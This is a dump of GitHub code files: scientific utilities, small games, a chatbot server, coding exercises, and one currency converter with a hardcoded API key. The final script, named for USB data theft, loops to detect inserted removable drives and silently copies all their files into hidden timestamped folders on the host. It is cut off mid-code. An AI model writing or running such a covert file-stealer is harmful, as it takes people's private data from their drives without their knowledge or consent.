ID\n begin_date (str): begin date in yyyyMMdd, MM/dd/yyyy, yyyyMMdd HH:mm, or MM/dd/yyyy HH:mm\n end_date (str) : begin date in yyyyMMdd, MM/dd/yyyy, yyyyMMdd HH:mm, or MM/dd/yyyy HH:mm\n datum (str) : E.g. MSL, STND, MHW, MLLW (default), MHHW, etc\n time_zone (str) : Either GMT (default), LST, or LST_LDT\n units (str) : Either english or metric (defaut)\n\n output param\n ------------\n content (dict): Requested prediction data from API. None if invalid inputs / API / response\n '''\n\n ## Put the requested parameters in a dictionary\n params = {'begin_date':begin_date, 'end_date':end_date, 'station':station,\n 'product':'predictions', 'datum':datum, 'time_zone':time_zone, 'units':units}\n ## Call pull_data to download data\n return pull_data (params)\n\ndef massage_data (content, doPred=False):\n\n ''' Massage data downloaded from API to a pandas time-series dataframe. The keys for\n prediction and observation data are different.\n\n input params\n ------------\n content (dict) : Data directly downloaded from API\n doPred (boolean): If True, input content is prediction data. If False, it is observations.\n\n output params\n -------------\n dataframe (pandas.DataFrame): a time-series dataframe of the download data.\n None if input content has invalid format.\n '''\n\n ## Define the key based on prediction / observation data\n apiKey = 'predictions' if doPred else 'data'\n myKey = 'predicted' if doPred else 'observed'\n\n # Try to interpret API content as data frame\n try:\n # Convert dict content to a dataframe\n data = numpy.array ([[aTime['t'], aTime['v']] for aTime in content[apiKey]]).T\n dataframe = pandas.DataFrame ({'datetime':data[0], myKey:data[1].astype (float)})\n # Convert dataframe to a time-series dataframe\n dataframe.index = pandas.to_datetime (dataframe.datetime)\n dataframe = dataframe.drop (axis=1, columns=['datetime']) \n except:\n print ('Failed to interpret data')\n return None\n\n return dataframe","repo_name":"NOAA-CO-OPS/co-ops-pyplot-challenge","sub_path":"myUtils.py","file_name":"myUtils.py","file_ext":"py","file_size_in_byte":5560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41441760045","text":"import requests\n\nclass main:\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.baseCur = input('Enter base currency symbolic notation: ')\n\t\tself.response = requests.get(f'https://v6.exchangerate-api.com/v6/c7aeeeb09a5d7c5ab1c47383/latest/{self.baseCur}')\n\t\tself.data = self.response.json() # Getting data in json format\n\t\tself.conversion = self.data['conversion_rates'] # Getting values and symbolic notations of currencies\n\n\tdef conversion_Base_to_Opted(self):\n\t\tself.usrINP = input(f'How many {self.baseCur}: ')\n\t\tself.usrOPT = input(f'Enter currency code to which {self.usrINP} {self.baseCur} will be converted: ')\n\t\ttry:\n\t\t\tself.usrINP = float(self.usrINP)\n\t\t\tif self.usrOPT in self.conversion:\n\t\t\t\tself.usrOPT_VAL = self.conversion.get(self.usrOPT)\n\t\t\t\tprint(f'{self.usrINP} INR --> {self.usrOPT_VAL * self.usrINP} {self.usrOPT}')\n\t\texcept Exception as e:\n\t\t\tprint(e)\n\nif __name__ == '__main__':\n\tmain = main()\n\tmain.conversion_Base_to_Opted()","repo_name":"PingalPie/Currency-Converter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26253355615","text":"# 41transmembrane.py\n\n# Write a program that predicts which proteins in a proteome are transmembrane\n\n# Transmembrane proteins are characterized by having\n# 1. a hydrophobic signal peptide near the N-terminus\n# 2. other hydrophobic regions to cross the plasma membrane\n\n# Both the signal peptide and the transmembrane domains are alpha-helices\n# Therefore, they do not contain Proline\n\n# Hydrophobicity can be measured by Kyte-Dolittle\n#\thttps://en.wikipedia.org/wiki/Hydrophilicity_plot\n\n# For our purposes:\n#\tSignal peptide is 8 aa long, KD > 2.5, first 30 aa\n#\tHydrophobic region is 11 aa long, KD > 2.0, after 30 aa\n\n# Hint: copy mcb185.py to your homework repo and import that\n# Hint: create a function for KD calculation\n# Hint: create a function for hydrophobic alpha-helix\n# Hint: use the same function for both signal peptide and transmembrane\n\nimport sys\nimport mcb185\n\n# create a KD calculation:\n\ndef KD_equ(smseq):\n\n\tKD = 0 \n\t\n\tfor aa in smseq:\n\t\tif aa =='I':\n\t\t\tKD += 4.5\n\t\telif aa == 'V':\n\t\t\tKD += 4.2\n\t\telif aa == 'L':\n\t\t\tKD += 3.8\n\t\telif aa == 'F':\n\t\t\tKD += 2.8\n\t\telif aa == 'C':\n\t\t\tKD += 2.5\n\t\telif aa == 'M':\n\t\t\tKD += 1.9\n\t\telif aa == 'A':\n\t\t\tKD += 1.8\n\t\telif aa == 'G':\n\t\t\tKD += -0.4\n\t\telif aa == 'T':\n\t\t\tKD += -0.7\n\t\telif aa == 'S':\n\t\t\tKD += -0.8\n\t\telif aa == 'W':\n\t\t\tKD += -0.9\n\t\telif aa == 'Y':\n\t\t\tKD += -1.3\n\t\telif aa == 'P':\n\t\t\tKD += -1.6\n\t\telif aa == 'H':\n\t\t\tKD += -3.2\n\t\telif aa == 'E':\n\t\t\tKD += -3.5\n\t\telif aa == 'Q':\n\t\t\tKD += -3.5\n\t\telif aa == 'D':\n\t\t\tKD += -3.5\n\t\telif aa == 'N':\n\t\t\tKD += -3.5\n\t\telif aa == 'K':\n\t\t\tKD += -3.9\n\t\telif aa == 'R':\n\t\t\tKD = -4.5\n\t\telse:\n\t\t\tcontinue\n\treturn KD\n\n\n# create an hydrophobic alpha-helix function\n\ndef alpha_h(smseq):\n\t\n\tproline = 0\n\tfor aa in smseq:\n\t\tif aa == 'P':\n\t\t\tproline += 1\n\t\telse:\n\t\t\tcontinue\n\treturn proline\n\t\n\n# copy and match function with signal peptide and transmembrane \n\nproteome = sys.argv[1]\n\nfor name_def, seq in mcb185.read_fasta(proteome):\n\n\tpeptide = 0\n\ttransmem = 0 \n\t\n\tsigpep = 8\n\tfor pos in range(0, 30 - sigpep + 1):\n\t\tsmseq = seq[pos:pos + sigpep]\n\t\tKD = KD_equ(smseq)\n\t\tproline = alpha_h(smseq)\n\t\tif KD / sigpep > 2.5 and proline == 0:\n\t\t\tpeptide += 1\n\t\n\thydro_reg = 11\n\tfor pos in range(31, len(seq) - hydro_reg + 1):\n\t\tsmseq = seq[pos:pos + hydro_reg]\n\t\tKD = KD_equ(smseq)\n\t\tproline = alpha_h(smseq)\n\t\tif KD / hydro_reg > 2.0 and proline == 0:\n\t\t\ttransmem += 1\n\t\n\tif peptide != 0 and transmem != 0:\n\t\tprint(name_def)\n\n\"\"\"\npython3 41transmembrane.py ~/DATA/E.coli/GCF_000005845.2_ASM584v2_protein.faa.gz\nNP_414560.1 Na(+):H(+) antiporter NhaA [Escherichia coli str. K-12 substr. MG1655]\nNP_414568.1 lipoprotein signal peptidase [Escherichia coli str. K-12 substr. MG1655]\nNP_414582.1 L-carnitine:gamma-butyrobetaine antiporter [Escherichia coli str. K-12 substr. MG1655]\nNP_414607.1 DedA family protein YabI [Escherichia coli str. K-12 substr. MG1655]\nNP_414609.1 thiamine ABC transporter membrane subunit [Escherichia coli str. K-12 substr. MG1655]\nNP_414653.1 protein AmpE [Escherichia coli str. K-12 substr. MG1655]\nNP_414666.1 quinoprotein glucose dehydrogenase [Escherichia coli str. K-12 substr. MG1655]\nNP_414695.1 iron(III) hydroxamate ABC transporter membrane subunit [Escherichia coli str. K-12 substr. MG1655]\nNP_414699.1 PF03458 family protein YadS [Escherichia coli str. K-12 substr. MG1655]\nNP_414717.2 CDP-diglyceride synthetase [Escherichia coli str. K-12 substr. MG1655]\n...\n\"\"\"\n","repo_name":"FastV1per/homework","sub_path":"41transmembrane.py","file_name":"41transmembrane.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28974572914","text":"from base.tree import TreeNode\n\n\nclass Solution(object):\n def hasPathSum(self, root, sum):\n \"\"\"\n 求是否有 跟到叶子结点的路径和为sum 的路径\n :type root: TreeNode\n :type sum: int\n :rtype: bool\n \"\"\"\n if not root:\n return False\n sum -= root.val\n if not root.left and not root.right and not sum:\n return True\n return self.hasPathSum(root.left, sum) or self.hasPathSum(root.right,\n sum)\n\n def f2(self, root, sum):\n stack = [root]\n while stack and root:\n cur = stack.pop()\n if not cur.left and not cur.right and cur.val == sum:\n return True\n if cur.right:\n cur.right.val += cur.val\n stack.append(cur.right)\n if cur.left:\n cur.left.val += cur.val\n stack.append(cur.left)\n return False\n\n\nif __name__ == '__main__':\n s = Solution()\n root = TreeNode([5, 4, 8, 11, None, 13, 4, 7, 2, None, 1])\n root = TreeNode([1, 2])\n print(s.hasPathSum(root, 3))\n","repo_name":"scolphew/leetcode_python","sub_path":"leetcode/_112_PathSum.py","file_name":"_112_PathSum.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11953084121","text":"class UnionFind:\n def __init__(self,N):\n self.count = N\n self.parent = [x for x in range(N)]\n self.rank = [0]*N\n\n def find(self,p):\n if p == self.parent[p]:\n return p\n self.parent[p] = self.find(self.parent[p])\n return self.parent[p]\n \n def union(self,p,q):\n rootP = self.find(p)\n rootQ = self.find(q)\n if rootP == rootQ:\n return\n if self.rank[rootQ]>self.rank[rootP]:\n self.parent[rootP] = rootQ\n else:\n self.parent[rootQ] = rootP\n if self.rank[rootP] == self.rank[rootQ]:\n self.rank[rootP]+=1\n self.count-=1\nN,M = [int(x) for x in input().split()]\n\nhosts = UnionFind(M)\n\nfor _ in range(M):\n x,y = [int(x) for x in input().split()]\n hosts.union(x,y)\n \nprint(hosts.count)","repo_name":"Hansel34/CPC","sub_path":"Kattis/Python/hoppers.py","file_name":"hoppers.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2610022861","text":"\nfrom tkinter import Tk,Canvas,StringVar,Button,Label\n\n\nclass VisualCanvas():\n _janela_ = None\n _status_ = None\n _buttonAtualiza_ = None\n _buttonNovaJanela_ = None\n _buttonNovaBola_ = None\n _canvas_ = None\n _novaJanela_ = None\n _nrJanela_ = 0\n def __init__(self,nr):\n self._nrJanela_ = nr + 1\n self._janela_ = Tk()\n print(\"Aqui deveria criara outra variavel\")\n self._status_ = Label(master=self._janela_)\n self._buttonAtualiza_ = Button(master=self._janela_,text=\"Comceçar\",command=self.alteraStatus)\n self._buttonNovaJanela_ = Button(master=self._janela_, text=\"Nova Janela\", command=self.novaJanela)\n self._buttonNovaBola_ = Button(master=self._janela_, text=\"Nova Bola\", command=self.novaBola)\n\n self._canvas_ = Canvas(master=self._janela_, height=500, width=500, bg=\"yellow\")\n self._buttonAtualiza_.pack()\n self._buttonNovaJanela_.pack()\n self._buttonNovaBola_.pack()\n self._status_.pack()\n self._canvas_.pack()\n _bola_ = None\n _bola2_ = None\n _listaBola_ = []\n _posInicial_ = 0\n def moveBola(self):\n self._canvas_.move(self._bola_,5,0)\n #self._canvas_.update()\n self._canvas_.after(300,func=self.moveBola)\n\n def moveBola2(self):\n for o in self._listaBola_:\n self._canvas_.move(o[0],o[1],0)\n self._canvas_.after(600,func=self.moveBola2)\n\n def alteraStatus(self):\n print(\"executando status \" + str(self._nrJanela_))\n self._status_.config(text=\"Iniciado\")\n self._bola_ = self._canvas_.create_oval(50, 50, 70, 70, outline=\"black\")\n self.moveBola()\n\n\n def novaBola(self):\n self._bola2_ = self._canvas_.create_oval(50, 300+self._posInicial_, 70, 320+self._posInicial_, outline=\"black\", fill=\"blue\")\n self._posInicial_ += 5\n self._listaBola_.append([self._bola2_,self._posInicial_])\n self.moveBola2()\n\n\n\n def novaJanela(self):\n self._novaJanela_ = VisualCanvas(self._nrJanela_)\n self._novaJanela_.iniciar()\n def iniciar(self):\n self._janela_.mainloop()\n\n","repo_name":"andrelb2000/PYTHON_PUCSP","sub_path":"PROJETO_CANVAS01/VISUAL_CANVAS.py","file_name":"VISUAL_CANVAS.py","file_ext":"py","file_size_in_byte":2126,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40646972644","text":"# coding: utf-8\nfrom __future__ import print_function\n\nfrom PySide2.QtCore import QSize, Qt\nfrom PySide2.QtGui import QIcon\nfrom PySide2.QtWidgets import QAction, QToolBar, QWhatsThis\n\nfrom ProfileInspector.src import nuke\n\n\nclass ToolBar(QToolBar):\n def __init__(self):\n QToolBar.__init__(self)\n self.setIconSize(QSize(15, 15))\n self.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)\n self.setMovable(False)\n\n self.setStyleSheet('''\n color: white;\n ''')\n\n self._initial_style = self.styleSheet()\n\n # XXX: for some unknown reason, older pyside2 cannot create a whatsthis instance\n # even though is still a class\n if nuke.env['NukeVersionMajor'] == 11:\n _whats_this = QWhatsThis\n else:\n _whats_this = QWhatsThis()\n\n self._whats_this_btn = _whats_this.createAction(self)\n self._whats_this_btn.setIcon(QIcon(':/icons/question'))\n","repo_name":"sisoe24/ProfileInspector","sub_path":"src/widgets/toolbar.py","file_name":"toolbar.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"26962377586","text":"import argparse\r\nimport numpy as np\r\n\r\ndef main():\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('method', type=str)\r\n parser.add_argument('--dir', type=str, default='temp')\r\n parser.add_argument('--dataset', type=str, default='hq')\r\n parser.add_argument('--subset', type=str, default='abcd')\r\n args = parser.parse_args()\r\n\r\n result = []\r\n split = [[0, 30], [30, 60], [60, 1000]]\r\n mean_len = [[], [], []]\r\n unable_to_achieve_full_coverage = 0\r\n unable_to_explore_in_time = 0\r\n total_eps = 0\r\n\r\n for s in [args.dataset + '-' + i for i in args.subset]:\r\n args.exp_name = f'eval_{args.method}_{s.replace(\"-\", \"\")}'\r\n args.scenes = f'scenes/{s}.scenes'\r\n with open(f'{args.dir}/dump/{args.exp_name}/explored_ratio.txt', 'r') as f:\r\n content = '[' + ''.join(f.readlines()).replace('\\n', '').replace('][', '],[').replace(' ', ',') + ']'\r\n ratio = eval(content)\r\n ratio = np.array([x[-1] for x in ratio])\r\n with open(f'{args.dir}/dump/{args.exp_name}/explored_area.txt', 'r') as f:\r\n content = '[' + ''.join(f.readlines()).replace('\\n', '').replace('][', '],[').replace(' ', ',') + ']'\r\n area = eval(content)\r\n area = np.array([x[-1] for x in area])\r\n with open(f'{args.dir}/dump/{args.exp_name}/close_episode_len.txt', 'r') as f:\r\n length = np.array([float(x.rstrip()) for x in f.readlines()])\r\n with open(args.scenes, 'r') as f:\r\n scenes = [x.rstrip() for x in f.readlines()]\r\n args.parallel = len(scenes)\r\n assert len(scenes) % args.parallel == 0\r\n scene_per_process = len(scenes) // args.parallel\r\n scenes = [scenes[i*scene_per_process:(i+1)*scene_per_process] for i in range(args.parallel)]\r\n ratio = ratio.reshape(args.parallel, -1)\r\n area = area.reshape(args.parallel, -1) / (ratio + 1e-3)\r\n length = length.reshape(args.parallel, -1)\r\n ratio_dict = {}\r\n area_dict = {}\r\n length_dict = {}\r\n valid_dict = {}\r\n for i in range(args.parallel):\r\n for j in range(ratio.shape[1]):\r\n scene_name = scenes[i][j % scene_per_process]\r\n if ratio_dict.get(scene_name) is None:\r\n ratio_dict[scene_name] = []\r\n area_dict[scene_name] = []\r\n length_dict[scene_name] = []\r\n valid_dict[scene_name] = []\r\n ratio_dict[scene_name].append(ratio[i, j])\r\n area_dict[scene_name].append(area[i, j])\r\n length_dict[scene_name].append(length[i, j])\r\n valid_dict[scene_name].append(ratio[i, j] > 0.7 and length[i, j] <= 2500)\r\n for d in [ratio_dict, area_dict, length_dict, valid_dict]:\r\n for k, v in d.items():\r\n d[k] = np.array(v)\r\n\r\n for i, j in ratio_dict.items():\r\n k = length_dict[i]\r\n a = area_dict[i]\r\n valid = np.logical_and(j > 0.7, k <= 2500)\r\n if not valid.any():\r\n valid[:] = True\r\n result.append('\\t'.join([\r\n i + ' ' * (20 - len(i)),\r\n '{:.0f}'.format(a.mean()),\r\n '{}\\t{}'.format(int(k[valid].mean()), int(k[valid].std())),\r\n '{:.1f}\\t{:.1f}'.format(100 * j[valid].mean(), 100 * j[valid].std()),\r\n '{:.0f}'.format(valid_dict[i].mean() * 100)\r\n ]))\r\n unable_to_achieve_full_coverage += (j <= 0.9).sum()\r\n unable_to_explore_in_time += (k == 2999).sum()\r\n total_eps += np.prod(j.shape)\r\n if 0.9 <= valid_dict[i].mean() < 1:\r\n result[-1] += f'\\t{np.argmin(valid_dict[i] * 1)}'\r\n for lst, r in zip(mean_len, split):\r\n if r[0] <= a.mean() < r[1]:\r\n for v in k:\r\n lst.append(v)\r\n\r\n print('\\n'.join(result))\r\n print('unable_to_achieve_full_coverage: {:.1f}%'.format(100 * unable_to_achieve_full_coverage / total_eps))\r\n print('unable_to_explore_in_time: {:.1f}%'.format(100 * unable_to_explore_in_time / total_eps))\r\n for lst, r in zip(mean_len, split):\r\n if lst == []:\r\n continue\r\n print('mean length [{}~{}m2]: {:.1f}'.format(r[0], r[1], sum(lst) / len(lst)))\r\n \r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"siyandong/NeuralCoMapping","sub_path":"scripts/easy_analyze.py","file_name":"easy_analyze.py","file_ext":"py","file_size_in_byte":4393,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"75"} +{"seq_id":"26429114750","text":"import socket\nimport threading\nimport argparse\nimport json\nimport datetime\nimport netifaces ### imported module netifaces - 09/11/17\nimport requests ### imported module requests - 09/11/17\nfrom aes import AESEncryption\nfrom weather import weather\nfrom currency import currency\n\nclass server(object): ### Dominic Egginton\n ''' server is a class that handled network connections, pass host ip, host port and AES key for init'''\n def __init__(self, hostIP, hostPort, key): ### Dominic Egginton\n self.hostIP = hostIP\n self.hostPort = hostPort\n self.key = key\n self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.socket.bind((self.hostIP, self.hostPort))\n print('** server started on\\n** internal - {}:{}\\n** external - {}:{}\\n'.format(self.getServerIP()['internal'], self.hostPort,self.getServerIP()['external'] ,self.hostPort))\n\n def serverListen(self): ### Dominic Egginton\n ''' serverListen listens to incoming connects from clients and opens a new thread for each connected client '''\n self.socket.listen(15)\n while True:\n try:\n client, clientAddress = self.socket.accept()\n client.settimeout(300)\n threading.Thread(target=self.receiveFromClient,args = (client, clientAddress)).start() # Open new thread for each client. calling receiveFromClient and pass the client socket and client address\n print('** Client Connected {} - {}'.format(clientAddress, self.getIpData(clientAddress)['city']))\n except:\n raise Exception('Client connection error')\n\n def getIpData(self, clientAddress): ### Dominic Egginton\n ''' getIpData returns ip data from http://ip-api.com/ in json format. pass client address as string '''\n request = requests.get('http://ip-api.com/json/{}'.format(clientAddress))\n requestJson = request.json()\n if requestJson['status'] == 'success':\n return requestJson\n else:\n return self.getIpData('') # recursive call in case client ip is in private range, therefore needs to get server ip data\n\n def receiveFromClient(self, client, clientAddress): ### Dominic Egginton\n ''' receiveFromClient handles incoming data from clients and sends formatted responses back to client '''\n byteSize = 4096 # large bytesize as we need to send and receive large data between client and server\n while True:\n try:\n receivedData = client.recv(byteSize)\n if receivedData and type(receivedData) == bytes:\n aesObject = AESEncryption(self.key)\n receivedStr = aesObject.decrypt(receivedData).replace('!',\"\").replace('?',\"\")\n client.sendall(aesObject.encrypt(self.formResponse(receivedStr, clientAddress, client)))\n else:\n print('** Client Disconnected {}'.format(clientAddress))\n client.close()\n return False\n except Exception as e:\n print(\"{} - Disconnecting {}\\n\".format(e, clientAddress))\n client.close()\n return False\n\n def formResponse(self, receivedStr, clientAddress, client): ### Charlie Barry and Dominic Egginton\n keysFound, extraData = self.searchJSON(receivedStr)\n # IF ONLY PYTHON HAD SWITCH STATEMENTS <- :) :)\n if 'curse' in keysFound: ### Tom has done the curse code\n return \"Please watch your language.\"\n\n elif 'currency' in keysFound:\n if extraData.get('currency'):\n currencyInfo = extraData.get('currency')\n currencyData = currency()\n answer = currencyData.convert(currencyInfo['cFrom'],currencyInfo['cTo'],currencyInfo['amount'])\n if answer != \"\":\n return \"{} {} in {} is {}\".format(currencyInfo['amount'],currencyInfo['cFrom'].upper(),currencyInfo['cTo'].upper(), answer)\n return \"Sorry, I can't convert that.\"\n\n elif 'weather' in keysFound:\n clientIpData = self.getIpData(clientAddress)\n weatherData = weather()\n return weatherData.weatherResponse(keysFound, clientIpData, extraData)\n\n elif 'cinema' in keysFound: ### Charlie Barry and Mitko Donchev\n ### I apologise for the laziness of this code, need to patch it up sometime :( - Charlie\n from cinema import searchCinema, showTime, fetchCinema #imports all the functions from cinema.py\n clientIpData = self.getIpData(clientAddress)\n location = {'latitude': clientIpData['lat'], 'longitude': clientIpData['lon']}#gets the location of the client from their ip address\n aesObject = AESEncryption(self.key)\n client.sendall(aesObject.encrypt(fetchCinema(location) + \"Select a cinema for more information (type 'back' to go back)\"))#sends message to client\n while True:\n cinemaData = client.recv(4096)#interepts message sent from client\n cinemaStr = aesObject.decrypt(cinemaData).replace('!',\"\").replace('?',\"\")#decrypts message into plaintext\n if cinemaStr.lower() != 'back':\n IDC = searchCinema(location)\n extracinemainfo = showTime(IDC,cinemaStr)\n client.sendall(aesObject.encrypt(extracinemainfo))#gets extra info for cinema and sends it to client\n if not(extracinemainfo == 'Wrong cinema! Please try again by chosing the right number!'):#if user inputted a legitimate answer\n cinemaData = client.recv(4096)#recieve any string\n break#returns to main server code\n elif cinemaStr.lower() == 'back':#if user says 'back' then returns to main server code\n break\n return \"Exitted Cinema Mode Successfully\"#returns to main server code\n\n\n elif 'ipinfo' in keysFound:\n ipData = self.getIpData(clientAddress)\n return \"Your IP is {}, provided by {}.\".format(ipData['query'], ipData['isp'])\n\n elif 'celery' in keysFound:\n return \"/w/https://youtu.be/MHWBEK8w_YY\"\n\n else:\n return \"Sorry, I don't understand what you are talking about.\"\n\n def getServerIP(self): ### Charlie Barry and Dominic Egginton\n ''' returns servers internal and external ip address as dictionary '''\n deviseName = netifaces.gateways()['default'][netifaces.AF_INET][1]\n return {'internal': netifaces.ifaddresses(deviseName)[netifaces.AF_INET][0]['addr'],'external': self.getIpData('')['query']}\n\n def searchJSON(self, recievedStr): ### Charlie Barry\n '''searches recievedStr for keywords which appear in keywords.json. returns a list of keysFound and a dictionary of additional data'''\n jsonData = json.load(open('keywords.json', encoding='utf-8'))\n recievedList = recievedStr.split(\" \")\n keysFound = []\n extraData = {}\n for key in jsonData: #for each key in jsonData\n for keyword in jsonData[key]: #get each keyword from the key\n for word in recievedList: #for each word in recievedList\n if word.lower() == keyword: #if said word is a keyword\n\n if key == 'location' and 'location' not in keysFound: #if the key is 'location', and a location has not yet been found\n try: #try\n extraData['location'] = recievedList[recievedList.index(word) + 1] #to add the following word to extraData\n keysFound.append(key) #and add the key to keysFound\n except: #otherwise\n continue #continue\n\n elif key == 'currency' and 'currency' not in keysFound: #if the key is 'currency', and a currency has not yet been found\n keysFound.append(key) #add the key to keysFound\n currencyData = currency() #create an instance of the class 'currency'\n extraData['currency'] = currencyData.inputStr(recievedStr) #then return the currency conversion and add this to extraData\n\n elif key == 'time' and 'time' not in keysFound: #if the key is 'time', and a time has not yet been found\n keysFound.append(key) #add the key to keysFound\n extraData['time'] = jsonData[key][keyword] #adds time to extraData\n\n else:\n if key not in keysFound: #if the key has not yet been found\n keysFound.append(key) #add key to keysFound\n continue\n\n return keysFound, extraData\n\n\ndef getArgs(): ### Dominic Egginton\n ''' getArgs returns all program arguments '''\n parser = argparse.ArgumentParser(description='Server')\n parser.add_argument('-p', '--port', metavar='Port', default=1143, type=int, help='Server port')\n parser.add_argument('-k', '--key', metavar='Key', default='gbaei395y27ny9', type=str, help='Encryption Key')\n return parser.parse_args()\n\ndef main(): ### Dominic Egginton\n ''' main - init server '''\n args = getArgs()\n if args.port == 1143:\n print('** no server port specified using default - 1143')\n server('', args.port, args.key).serverListen() # i have passed empty string for the host ip as it will be filled in later\n\nif __name__ == '__main__':\n main()\n","repo_name":"dominicegginton/chatBot","sub_path":"server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"17589150671","text":"from utils.connection import connect_db\nfrom sqlalchemy.orm import Session\nfrom mymodels import User, Order # 假設你已經定義了 User 和 Order 這兩個模型\n\n# 建立資料庫連線\nengine = connect_db()\n\n# 建立 Session 物件\nsession = Session(engine)\n\n# 執行 JOIN 查詢\n# 查詢 User 和 Order 兩個表格中符合條件的記錄,並將結果放入 User 物件中\n\n# SELECT users.*\n# FROM users\n# JOIN orders ON users.userid = orders.userid\n# WHERE orders.status = 'completed';\nusers = session.query(User).join(Order, User.userid == Order.userid).filter(Order.status == 'completed').all()\n\n# SELECT users.username\n# FROM users\n# JOIN orders ON users.userid = orders.userid\n# WHERE orders.status = 'completed';\nusers = session.query(User.username).join(Order, User.userid == Order.userid).filter(Order.status == 'completed').all()\n\n\n\n# 使用查詢結果\nfor user in users:\n print(f\"User ID: {user.userid}, Username: {user.username}, Email: {user.email}\")\n\n# 關閉 Session\nsession.close()\n","repo_name":"AdlerHu/SQLAlchemy","sub_path":"join.py","file_name":"join.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"33300286743","text":"import pandas as pd\nimport numpy as np\n\ndef do_interpolation(data, separator=\";\"):\n\n df = pd.read_csv(data, sep=separator)\n\n x, y = df['x'], df['y']\n\n # to be chosen by user\n x_new = df['x_new'].dropna()\n\n\n y_new = np.interp(x_new, x, y)\n\n\n df_interp = pd.DataFrame()\n df_interp[\"x\"] = x_new\n df_interp[\"y\"] = y_new\n\n\n return df, df_interp","repo_name":"p-acDev/tool-box","sub_path":"apps/interpolation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5796787858","text":"from flask import json\nimport random\n\n\ndef setplayer(pname,powerup):\n player = {\n \"name\" : pname,\n \"powerup\" : powerup,\n \"life\" : 3,\n \"win\" : 0\n }\n return player\n\n\ndef save(info):\n import midtest\n with open('static/saveinfo.txt', 'w', encoding = 'utf-8') as s:\n json.dump(info, s, ensure_ascii = False, indent='\\t')\n\n\ndef load():\n with open('static/saveinfo.txt', 'r', encoding='utf-8') as load:\n data = load.read()\n player = json.loads(data)\n return player\n\ndef update(result):\n update = load()\n if result == 'drawwin' or result == 'win':\n update[\"win\"] += 1\n elif result == 'lose':\n update[\"life\"] -= 1\n with open('static/saveinfo.txt', 'w', encoding = 'utf-8') as s:\n json.dump(update, s, ensure_ascii = False, indent='\\t')\n\n\ndef changenum():\n player_info = load()\n if player_info[\"powerup\"] == '가위':\n return 1\n elif player_info[\"powerup\"] == '바위':\n return 2\n else :\n return 3\n\n\ndef play(num):\n other_num = random.randint(1,3)\n powerup = random.random()\n if num == other_num:\n if changenum() == num and powerup >= 0.5: \n update('drawwin')\n return 'drawwin'\n else:\n return 'draw'\n elif (num+1)%3 == other_num%3:\n update('lose')\n return 'lose'\n else :\n update('win')\n return 'win'\n","repo_name":"kvr3010/kit2020_2_1_MID","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"41110091115","text":"#!/usr/bin/env python3\n\nspreadsheet = []\n\nwith open(\"./input.txt\") as f:\n data = f.read().split(\"\\n\")[:-1]\n\nfor line in data:\n spreadsheet.append([int(num) for num in line.split(\"\\t\")])\n\nchecksum = 0\n\nfor line in spreadsheet:\n small = min(line)\n big = max(line)\n checksum += (big - small)\n\nprint(checksum)\n","repo_name":"tannerstephens/advent-of-code","sub_path":"2017/02/solve1.py","file_name":"solve1.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24371784001","text":"\n\nimport subprocess, os, filecmp, shutil\nfrom datetime import datetime\nfrom time import sleep\n\nwhile True:\n\n # path & variables \n\n tmp_file = r\"C:\\Temp\\log.txt\"\n\n home_folder = r\"C:\\DTheft_USB\"\n now = datetime.now()\n dt_string = now.strftime(\"%a%d%y%H%M%S\")\n\n newfolder = home_folder+chr(92)+dt_string+chr(92) \n files = str(newfolder)\n makelog = str(newfolder)+\"log.txt\"\n makefolder = str(newfolder)\n make_abs = os.path.abspath(makelog)\n\n\n output = subprocess.check_output(\"wmic logicaldisk get caption, drivetype\", shell=True)\n data = str(output)\n x = data.find(\"2\")\n if not x == -1 :\n\n get = data.find(\"2\")\n cvt = int(get)\n divise = cvt - 9\n getD = data[divise:cvt]\n global lecteur\n lecteur = getD[0:2]\n print(\"Your driver stolen is: \", lecteur)\n path_dir = \"dir /W \"+lecteur+\">\"+tmp_file\n full_path_dir = str(path_dir)\n cmd = \"cmd /C\" +full_path_dir\n\n\n os.system(cmd) # Creat the log file into c:\temp\\log.txt\n \n\n\n\n if not os.path.exists(home_folder):\n os.system(\"cls\")\n print(\"Folder name is: \",dt_string)\n add_folder = \"md \"+newfolder\n os.system(add_folder)\n\n shutil.copyfile(tmp_file, make_abs)\n dthief_files = \"xcopy \"+lecteur+\"\\*.* /Q /E /Y \"+files+\"*.*\"\n os.system(dthief_files)\n \n\n elif os.path.exists(home_folder):\n list_comp = []\n for dirpath, dirnames, filenames in os.walk(home_folder):\n for filenames in [f for f in filenames if 